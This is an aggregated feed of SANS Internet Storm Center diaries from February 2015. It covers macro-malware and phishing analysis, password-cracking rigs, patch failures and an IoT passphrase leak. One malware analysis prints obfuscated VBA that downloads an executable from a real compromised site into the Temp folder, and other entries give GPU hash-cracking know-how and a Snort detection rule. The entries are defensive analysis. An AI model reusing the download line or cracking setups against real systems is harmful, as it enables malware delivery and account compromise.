Alerts

ISC StormCast for Monday, February 23rd 2015 http://isc.sans.edu/podcastdetail.html?id=4367, (Mon, Feb 23rd)

Latest Alerts - Sun, 02/22/2015 - 18:23
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Leave Things Better Than When You Found Them, (Sun, Feb 22nd)

Latest Alerts - Sat, 02/21/2015 - 16:12

Whether at the end of a project or at the end of your time with an organization, there are some low-impact, high-reward actions you can take to ensure that you leave things better than when you found them. Although it is not without risk for us as security professionals, if you have the opportunity it is ideal to spend time training your successor before you leave. Through a few intentional actions you can leave a legacy that can inspire others not only to sustain but to actually improve operations.

This topic is particularly close to me now because I have recently started a new position. I had the opportunity to share my experience with others and found it to be rewarding and also a little uncomfortable, for me and for the person who was assuming my duties. I found myself personally and professionally vested in the success of the program while recognizing that it was time for me to let go. There are of course certain circumstances that will prevent this sharing from happening. Sometimes policies will dictate that when someone resigns, the team members are escorted from the premises right away.

Even if you are not making your next career move, maybe you are transitioning off a project and can use this time to help others. The following are some suggestions on what you can provide to your successor:

  • Operational guides
  • Original installation media
  • Configuration checklists
  • Installation guides along with clear documentation of any deviations from the vendor instructions
  • Lessons learned of things that must be done along with those that must *never* be done
  • Key contacts to support sustaining the project such as administrators, change control tickets and project documentation

Even if you are not on the way out, I recommend that you begin with the end in mind today. Start by setting a monthly reminder on your work calendar to update and maintain your project or program documentation. You may very well recognize that the person this helps the most is you!

Use the comments section to share what you are doing to leave things better than when you found them.

Russell Eubanks
@russelleubanks
Securityeverafter gmail com


Authentication Bypass in TYPO3 CMS 4.5 - https://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2015-001/, (Sat, Feb 21st)

Latest Alerts - Sat, 02/21/2015 - 11:19

----------- Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


ISC StormCast for Friday, February 20th 2015 http://isc.sans.edu/podcastdetail.html?id=4365, (Fri, Feb 20th)

Latest Alerts - Thu, 02/19/2015 - 20:14

Fast analysis of a Tax Scam, (Fri, Feb 20th)

Latest Alerts - Thu, 02/19/2015 - 17:12

It's tax time and I'm starting to see a lot of phish/spam on this subject. Below is a popular one from the last couple of days.

    TAX RETURN FOR THE YE[...]
    RECALCULATION OF YOUR R[...]
    HR[...]
    LOCAL OFFI[...]
    TAX CREDIT OFFICER: Jimmie B[...]
    TAX REFUND ID NU[...]
    REFUND AMOUN[...]
    D[...]
    The contents of this email and any attachments are confidential and [...] applicable, copyright in these is reserved to IRS Revenue [...] Unless expressly authorised by us, any further diss[...] distribution of this email or its attachments is prohibited.

    If you are not the intended recipient of this email, please re[...] inform us that you have received this email in error and th[...] delete it without retaining an[...] o[...] I am sending this email to announce: After the last annual calculation [...] your fiscal activity we have determined that you are eligible [...] receive a tax refund [...] You have attached the tax return form with the TAX REFUND NUM[...] ID: 2440409, complete the tax return form attached to this message.

    After completing the form, please submit the form by clicking the SUBMIT button on f[...] Sin[...] Jimmie [...] IRS Tax Credit [...] TAX REFUND ID: US2440409-IRS

    Copyright 2015, IRS Revenue [...] All rights r[...]
    ======================

With so many of these types of mails, analysis needs to be quick to determine who may have been affected.

    $ mv tax_refund_2440409.zip MALWARE-tax_refund_2440409.zip

    inflating: [Content_Types].xml
    inflating: _rels/.rels
    inflating: word/_rels/document.xml.rels
    inflating: word/document.xml
    inflating: word/header3.xml
    inflating: word/footer2.xml
    inflating: word/footer1.xml
    inflating: word/header2.xml
    inflating: word/header1.xml
    inflating: word/endnotes.xml
    inflating: word/footnotes.xml
    inflating: word/footer3.xml
    inflating: word/theme/theme1.xml
    inflating: word/_rels/vbaProject.bin.rels
    inflating: word/vbaProject.bin
    inflating: word/settings.xml
    inflating: word/vbaData.xml
    inflating: word/webSettings.xml
    inflating: word/styles.xml
    inflating: docProps/app.xml
    inflating: docProps/core.xml
    inflating: word/fontTable.xml


The vbaProject.bin file contains the code we want to look at, so we run strings on it.

    $ strings /word/vbaProject.bin

    $someFilePath = ...


Within about 2 minutes I was able to determine some basic IOCs and see if anyone actually accessed the site or tried to ping the address.

If you want to dig deeper and spend a bit more time, you can install and configure oledump, which was discussed in an earlier diary (hxxps://isc.sans.edu/diary/oledump+analysis+of+Rocket+Kitten+-+Guest+Diary+by+Didier+Stevens/19137).

    A1: 556 PROJECT
    A2: 71 PROJECTwm
    A3: 97 UserForm1/\x01CompObj
    A4: 266 UserForm1/\x03VBFrame
    A5: 58 UserForm1/f
    A6: 0 UserForm1/o
    A7: M 25751 VBA/ThisDocument
    A8: m 1159 VBA/UserForm1
    A9: 4506 VBA/_VBA_PROJECT
    A10: 811 VBA/dir

    $ python oledump.py -s A7 -v MALWARE-tax_refund_2440409.doc

    Print #FileNumber, strRT = + Chr(34) + h + Chr(Asc(Chr(Asc(t)))) + t + p + ://www.zaphira.de/wp-admin/includes/file + . + Chr(Asc(e)) + Chr(Asc(x)) + e
    Print #FileNumber, $someFilePath = c:\Users\ + USER + \AppData\Local\Temp\ + 444.e Chr(Asc(x)) + e


In this case, oledump gave us a lot more info, but it also proves we were on the right track with a simple strings run over the file. Additionally, we can see that an infected user may have a file called 444.exe. There are lots more local IOCs we could create, but with the few network IOCs we can quickly get an idea of possibly affected users.

--

Tom Webb


ISC StormCast for Thursday, February 19th 2015 http://isc.sans.edu/podcastdetail.html?id=4363, (Thu, Feb 19th)

Latest Alerts - Wed, 02/18/2015 - 19:47

DNS-based DDoS, (Thu, Feb 19th)

Latest Alerts - Wed, 02/18/2015 - 16:45

ISC reader Zach reports that his company currently sees about 4Gbps of DNS requests beyond what is normal, and all seem to originate from 91.216.194.0/24. Yup, someone on that IP range in Poland is likely having a slow network day.

To make it less likely that your DNS servers unwittingly participate in a denial of service attack against someone else, consider using rate-limiting. If you are not running a massively popular eCommerce site, odds are your bandwidth and the load limit of your DNS server are way way beyond what you actually need.

The easiest way to rate-limit (if you use Linux) is to put an iptables rule on port 53 that controls how many packets per source IP address will be accepted per minute. BIND, one of the most popular DNS servers, introduced a response rate-limiting option in version 9.10 that lets you define how many responses per second the server will provide before it starts dropping them. Both are good ideas if you run an authoritative DNS server that has way more bandwidth and muscle than your actual usage requires.


Macros? Really?!, (Thu, Feb 19th)

Latest Alerts - Wed, 02/18/2015 - 16:15

Yes indeed! While the past 15 years or so were mostly devoid of any significant macro viruses, macro-based malware is now making a successful comeback. Last week, we saw a significant Dridex malware run that was using macros in Excel files (.XLSM), and earlier this week, the crooks behind the banking spyware Vawtraq started to spam the usual FedEx Package and Tax Refund emails, but unlike in other malspam runs, the attachment was no longer a ZIP with an EXE or SCR inside, but rather a file in Microsoft Office .DOC format. File-extension-based blocking on the email gateway is not going to save your bacon on this one!

For Vawtraq, if the recipient opens the DOC, the content looks garbled, and the only readable portion is in (apparently) user-convincing red font, asking the recipient to enable macros. You can guess what happens next if the user falls for it: a VBS and a PowerShell file get extracted from the DOC, and then download and run the Vawtraq malware executable. The whole mess has very low detection in anti-virus: yesterday's Vawtraq started with zero hits on VirusTotal, and even today, one day later, it hasn't made it past 7/52 anti-virus engines detecting the threat. Thus, odds are you will need to revert to manual analysis to determine if a suspicious Office document is indeed malicious, and to extract any indicators from it that can help to discover users on your network who have been had.

Besides Didier Stevens' oledump that we covered last month, my favorite toolkit for this analysis is the python-oletools package by Philippe Lagadec. olevba in particular does a great job at parsing out all the obfuscated code, and is often even able to extract actionable indicators of compromise (IOCs), like URLs and IP addresses. The example below is an abbreviated olevba analysis of a recent Dridex run, and it nicely shows how the next-stage URL and EXE name are pulled out in one quick swoop. Give it a try!

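Both this diary and the tax-scam diary above turn on the same step: resolving VBA string-building such as "h" + Chr(Asc("t")) + ... into the plain next-stage URL and EXE name. The following is an added example, not code from either diary nor from oletools or oledump: a small evaluator for that concatenation idiom plus an IOC extractor over its output. The VBA lines are constructed to mirror the two Print statements shown earlier, the domain www.example.invalid is a placeholder, and <USER> is this example's marker for an unresolved VBA variable.

```python
import re
from urllib.parse import urlparse

# Constructed VBA lines shaped like the diary's two Print statements, with the hostile
# domain replaced by the placeholder www.example.invalid.  USER is an unresolved VBA
# variable; the evaluator keeps it as the marker <USER>.
SAMPLE_VBA = [
    '"strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p"'
    ' + "://www.example.invalid/wp-admin/includes/file" + "." + Chr(Asc("e"))'
    ' + Chr(Asc("x")) + "e" + Chr(34)',
    r'"$someFilePath = " + Chr(34) + "c:\Users\" + USER + "\AppData\Local\Temp\"'
    r' + "444.e" & Chr(Asc("x")) + "e" + Chr(34)',
]
# A VBA token: string literal ("" escapes a quote), integer, identifier or operator.
_TOKEN = r'"(?:[^"]|"")*"|\d+|[A-Za-z_]\w*|[()+&]'
URL_RE = re.compile(r'https?://[^\s"\'<>]+', re.I)
PATH_RE = re.compile(r'[a-z]:\\[^\s"\']+', re.I)

class _Eval:
    """Recursive-descent evaluator for literals, Chr() and Asc() joined by + or &."""
    def __init__(self, expr):
        if not re.fullmatch(rf'(?:\s*(?:{_TOKEN}))*\s*', expr):
            raise ValueError(f"unsupported VBA syntax in {expr!r}")
        self.toks, self.i = re.findall(_TOKEN, expr), 0

    def _take(self, expected=None):
        tok = self.toks[self.i] if self.i < len(self.toks) else ""
        if expected not in (None, tok):
            raise ValueError(f"expected {expected!r}, got {tok!r}")
        self.i += 1
        return tok

    def expr(self):
        left = self.atom()
        while self.i < len(self.toks) and self.toks[self.i] in ("+", "&"):
            op, right = self._take(), self.atom()
            # VBA: & always concatenates; + concatenates when either side is a string.
            if op == "&" or isinstance(left, str) or isinstance(right, str):
                left = str(left) + str(right)
            else:
                left = left + right
        return left

    def atom(self):
        tok = self._take()
        if tok.startswith('"'):
            return tok[1:-1].replace('""', '"')
        if tok.isdigit():
            return int(tok)
        if not re.fullmatch(r"[A-Za-z_]\w*", tok):
            raise ValueError(f"unexpected token {tok!r}")
        if self.toks[self.i:self.i + 1] != ["("]:
            return f"<{tok}>"  # unresolved variable: keep a marker in the output
        self._take("(")
        arg = self.expr()
        self._take(")")
        if tok.lower() not in ("chr", "asc"):
            raise ValueError(f"unsupported function {tok}")
        return chr(arg) if tok.lower() == "chr" else ord(str(arg)[0])

def deobfuscate(expr):
    """Evaluate one VBA string-building expression to the text it produces."""
    ev = _Eval(expr)
    value = ev.expr()
    if ev.i != len(ev.toks):
        raise ValueError("trailing tokens in expression")
    return str(value)

def extract_iocs(vba_lines):
    """Deobfuscate each line and pull URLs, hostnames and Windows paths out of it."""
    urls, paths = set(), set()
    for text in map(deobfuscate, vba_lines):
        urls.update(URL_RE.findall(text))
        paths.update(PATH_RE.findall(text))
    return {"urls": sorted(urls), "paths": sorted(paths),
            "hosts": sorted(urlparse(u).hostname for u in urls)}
```

The "hosts" list is what you would then match against proxy and DNS logs to find users who fetched the next stage, and "paths" gives the local artifact (here 444.exe under the user's Temp directory) to look for on endpoints.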


ISC StormCast for Wednesday, February 18th 2015 http://isc.sans.edu/podcastdetail.html?id=4361, (Wed, Feb 18th)

Latest Alerts - Tue, 02/17/2015 - 19:48

A Different Kind of Equation, (Tue, Feb 17th)

Latest Alerts - Tue, 02/17/2015 - 02:37

Both the mainstream media and our security media are abuzz with Kaspersky's disclosure of their research on the Equation group and the associated malware. You can find the original blog post here: http://www.kaspersky.com/about/news/virus/2015/equation-group-the-crown-creator-of-cyber-espionage

But if you want some real detail, check out the Q&A: http://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf

Way more detail, and much more sobering to see that this group of malware goes all the way back to 2001, and includes code to map disconnected networks (using USB key C&C like Stuxnet did), as well as the disk firmware facet that's everyone's headline today.

Some Indicators of Compromise (something we can use to identify whether our organizations or clients are affected) are included in the PDF. The DNS IoCs included are especially easy to use, either as checks against logs or as black-hole entries.

===============
Rob VandenBrink
Metafore


ISC StormCast for Tuesday, February 17th 2015 http://isc.sans.edu/podcastdetail.html?id=4359, (Tue, Feb 17th)

Latest Alerts - Mon, 02/16/2015 - 19:42

Throwing more Hardware at Password Cracking - Lessons Learned, (Tue, Feb 17th)

Latest Alerts - Mon, 02/16/2015 - 19:17

A while back I put up an article on exposing a GPU to a virtual machine for cracking password hashes (https://isc.sans.edu/forums/diary/Building+Your+Own+GPU+Enabled+Private+Cloud/16505). This worked great for me for a while, but then it became evident that one or two GPUs just wasn't enough: each GPU adds a linear amount of processing power, so 6 GPUs will solve problems 6 times faster than a single one. Problems like cracking wireless keys, Windows passwords, passwords on documents or databases, any number of things (150 different hash types in the latest version of hashcat).

What I found when I added more GPUs to my ESX host was that there's a limit on VT-d (DirectPath I/O in ESX): you can only assign up to 8 devices in ESXi 5.x. Since each GPU represents 2 devices, that's only 4 GPUs. (http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=1010789)

So I had to go to a physical server to get past 4. What more is there to learn, you ask? First of all, the Linux drivers just don't cut it. Getting more than a few GPUs to be recognized from one reboot to the next is a challenge, even if you use the exact OS versions and drivers recommended. Even getting lspci to see them all was a gamble; each time I powered the server on was a roll of the dice.

Windows drivers work fairly well. However, in Windows 7 there's a hard limit of 4 AMD GPUs (mine are AMD R9 280Xs) buried in the driver. Don't forget that these are supposed to be graphics adapters, and limiting a system to 4 PCIe x16 graphics cards actually makes decent sense. However, we're not using these for graphics! You can fix this limit with some judicious registry edits, but these vary quite a bit depending on the GPU model and OS. The fine folks at lbr.id.lv put together an executable (6xGPU_Mod) that builds the registry changes for your setup; find it here:
https://lbr.id.lv/6xgpu_mod/6xGPU_mod.html

But wait, there's more! oclHashcat requires a specific version of the AMD drivers to work correctly. Again, these are graphics cards, and the newer versions of the driver apparently don't lend themselves to computation (a bug that doesn't affect graphics does affect mathematical calculation). Today's recommendation (for oclHashcat) is to use AMD driver version 14.9 (exactly), and no other. This version recommendation does change; refer back to the documentation for whatever tools you are using for driver version recommendations.

Also, don't skimp on power supplies. I have 2500W available (2x1250) for these 6 GPUs and the powered risers that feed them, plus the power supply for the system unit. If the cards don't have enough power, either they'll just run slower or they won't run; either way it's an easy fix. And if you have issues during the build (everyone does on these), ruling out power problems is a good start in resolving them. I budget 300W per card, likely at least a bit overkill, but I'd rather have a bit extra than be a bit short. The old proverb "when in doubt, max it out" is a good one for a reason.

At long last though, I now have 6 GPUs dedicated to cracking whatever encrypted information I need to throw them at!

One final note: yes, I do know that you can spin up an AWS instance with GPUs to perform similar functions. In my practice though, I'm not comfortable cracking customer passwords on someone else's server. Also, in my previous rig, it was not uncommon to see password cracking runs for a typical list of hashes take 5-7 days with 2 GPUs running flat-out; depending on the list and the hashing algorithm, this can run up to some serious computation time, which costs real dollars in a cloud service. Bumping the count up to 6 GPUs in my own build cuts the time for me down by a factor of 3 for a pretty low cost, and still keeps the password hashes (and cracked passwords) in my own rack of servers.

If you've found other gotchas in this sort of implementation, or if you've had good luck using a cloud service for stuff like this, please use our comment form and let us know how you've fared!

===============
Rob VandenBrink
Metafore


oclHashcat 1.33 Released, (Tue, Feb 17th)

Latest Alerts - Mon, 02/16/2015 - 19:01

In the author's own words, oclHashcat 1.33 is "what 1.32 should have been". I think they're too hard on themselves; 1.32 was pretty darned good too. There are a number of good changes in 1.33 though. Of interest to most of us is support for PDF passwords and PBKDF2 (2 variants of that so far). Look for more PBKDF2 variants in days to come; version 1.33 sees a PBKDF2 kernel added. Also a new feature that will affect the bottom line of many folks who use oclHashcat: wordlist processing is now multithreaded, so expect to see dictionary attacks run quicker.

So if your client took your advice and moved their MD5-hashed password database to PBKDF2, with a few more GPUs you can make a point on that new method as well. Though I'm not sure what you'd recommend to replace PBKDF2 ...

In my rig (6 GPUs), I'm seeing 3 million hashes per second on PBKDF2, and 30,000 hashes per second on PDF 1.7 level 8 (Acrobat 10 or 11). So PBKDF2 is still way more computationally expensive than MD5 (now tracking around 54 billion hashes per second), but if you use intelligent, targeted password lists (maybe using CeWL for a base list and perhaps some numeric / season mods folded into those words), you can still make a serious dent in a list of poorly chosen passwords (in other words, almost any hashed password list).

Happy password cracking!

===============
Rob VandenBrink
Metafore


Microsoft Patch Mayhem: February Patch Failure Summary, (Mon, Feb 16th)

Latest Alerts - Mon, 02/16/2015 - 07:03

February was another rough month for anybody having to apply Microsoft patches. We had a couple of posts already covering the Microsoft patch issues, but due to the number of problems, here is a quick overview of what has failed so far:

Bulletin/KB #: MS15-009 / KB 3023607
  Patch: SSL fix to address the POODLE vulnerability.
  Symptom: Cisco AnyConnect will refuse to connect.
  Solution: run the AnyConnect client in Windows 7 or Windows 8 Compatibility Mode.

Bulletin/KB #: KB2920732
  Patch: PowerPoint (functionality fix, not a security patch).
  Symptom: PowerPoint 2013 fails to start on Windows RT.
  Solution: refresh your device (see https://support.microsoft.com/kb/2751424) or remove the patch. Microsoft did withdraw the patch.

Bulletin/KB #: MS15-010 / KB3013455
  Patch: Windows Kernel Mode Drivers.
  Symptom: Font quality degrades in Windows Vista SP2 and Windows Server 2003 SP2 (also affected: Windows XP if you paid for extended support).
  Solution: remove the patch.

Bulletin/KB #: KB3001652
  Patch: Update for Microsoft Visual Studio 2010 Tools for Office Runtime.
  Symptom: Patch will not finish installing and hangs, making the system unresponsive.
  Solution: This patch has to be installed as Administrator. Otherwise, the user will not see a dialog box that needs to be acknowledged to complete the install. Microsoft withdrew the patch and later reissued it. No problems with the re-issued version.

There are 3 versions [...]. An important reminder: the Group Policy patch alone does not fix the actual vulnerability. In addition to applying the patch, you have to enable the new group policy options.

See https://support.microsoft.com/kb/3000483 for details.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn


ISC StormCast for Monday, February 16th 2015 http://isc.sans.edu/podcastdetail.html?id=4357, (Mon, Feb 16th)

Latest Alerts - Sun, 02/15/2015 - 19:02

End of the m0n0wall project - http://seclists.org/oss-sec/2015/q1/565, (Sun, Feb 15th)

Latest Alerts - Sun, 02/15/2015 - 14:10

----------- Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Microsoft February Patch Failures Continue: KB3023607 vs. Cisco AnyConnect Client, (Fri, Feb 13th)

Latest Alerts - Fri, 02/13/2015 - 09:32

Another patch released by Microsoft this month is causing problems. This time it is KB3023607, which was supposed to mitigate the POODLE vulnerability. Once applied, Cisco AnyConnect users are no longer able to connect to their VPN.

For more details, also see the Cisco bug report https://tools.cisco.com/bugsearch/bug/CSCus89729 (requires login).

The issue appears to affect Windows 8.1, in which case running the application (vpnui.exe) in Windows 8 compatibility mode will fix the problem for now.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn


ISC StormCast for Friday, February 13th 2015 http://isc.sans.edu/podcastdetail.html?id=4355, (Fri, Feb 13th)

Latest Alerts - Fri, 02/13/2015 - 03:59

Did You Remove That Debug Code? Netatmo Weather Station Sending WPA Passphrase in the Clear, (Thu, Feb 12th)

Latest Alerts - Fri, 02/13/2015 - 03:59

(BTW: it looks like the firmware update released this week by Netatmo after reporting this issue fixes the problem. Still trying to completely verify that this is the case.)

I have the bad habit of playing with home automation and various data acquisition tools. I could quit any time if I wanted to, but so far I have decided not to. My latest toy to add to the collection was a Netatmo weather station.

Setting up the device was pretty straightforward, and looked secure. It requires connecting to the device via USB, and a custom application is used to configure the device with your username, password and WiFi settings, including the WiFi password. After the initial setup, the station needs USB for power only, and communicates via WiFi to the cloud.

But after the simple setup, a nice surprise:

    [**] [1:1000284:0] WPA PSK Passphrase Leak [**] [Priority: 0] {TCP} a.b.c.d:21908 -> 195.154.176.41:25050

I do have a custom rule in my snort rule set, alerting me of the passphrase:

    alert ip any any -> any any (msg:"WPA PSK Passphrase Leak"; content:"[Iamnotgoingtotellyou]"; sid:1000284;)

So what happened? After looking at the full capture of the data, I found that indeed the weather station sent my password to the cloud, along with some other data. The data include the weather station's MAC address, the SSID of the WiFi network, and some hex encoded snippets.

Not only should data like this not be transmitted in the clear, but in addition, there is no need for Netatmo to know the WPA password for my network. Netatmo's response to the report:

    "We will remove this debug memory very soon (coming weeks)."

So far I haven't seen any additional transmissions from the weather station containing the password, even after restarting it. I didn't do a full factory reset yet. But in general, the data appears to be unencrypted. The MAC address of the station and the outdoor sensor are easily found in the payload. So far, I couldn't find any documentation for the protocol, so it will take a bit more time to reverse it.
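The snort content rule above only fires when the passphrase crosses the wire verbatim; the diary also notes hex encoded snippets in the same payload. As an added example (not the diary's code), the following checks captured station-to-cloud payloads for a secret in plain, hex and base64 form and reports the flow that carried it. The flows, MAC address, addresses and passphrase are all constructed.

```python
import base64
import binascii

# Constructed secret and TCP payloads standing in for station-to-cloud traffic: the
# first carries the passphrase verbatim, the second hex-encodes it, the third is benign
# telemetry.  Addresses and the MAC are placeholders, not real Netatmo values.
SECRET = b"MyWiFiPassphrase2015"
SAMPLE_FLOWS = [
    ("192.168.1.50:21908", "203.0.113.10:25050",
     b"\x00\x10mac=02:ab:cd:12:34:56;ssid=HomeNet;key=MyWiFiPassphrase2015;\x00"),
    ("192.168.1.50:21909", "203.0.113.10:25050",
     b"\x00\x10mac=02:ab:cd:12:34:56;blob=" + binascii.hexlify(SECRET) + b";\x00"),
    ("192.168.1.50:21910", "203.0.113.10:25050",
     b"\x00\x10mac=02:ab:cd:12:34:56;t=21.5;\x00"),
]

def encodings_of(secret):
    """Forms a leaked secret may take on the wire: plain, hex (both cases), base64."""
    hexed = binascii.hexlify(secret)
    return {"plain": secret, "hex": hexed, "HEX": hexed.upper(),
            "base64": base64.b64encode(secret)}

def find_leaks(flows, secret):
    """Return (src, dst, encoding) for each flow that carries the secret in any form."""
    forms = encodings_of(secret)
    hits = []
    for src, dst, payload in flows:
        for name, needle in forms.items():
            if needle in payload:
                hits.append((src, dst, name))
                break  # one report per flow, first matching encoding wins
    return hits
```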

According to the weather station map provided by Netatmo, these devices are already quite popular. Here is a snapshot of the map in my neighborhood:

[image: Netatmo weather station map of the neighborhood]

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn


ISC StormCast for Thursday, February 12th 2015 http://isc.sans.edu/podcastdetail.html?id=4353, (Thu, Feb 12th)

Latest Alerts - Wed, 02/11/2015 - 17:25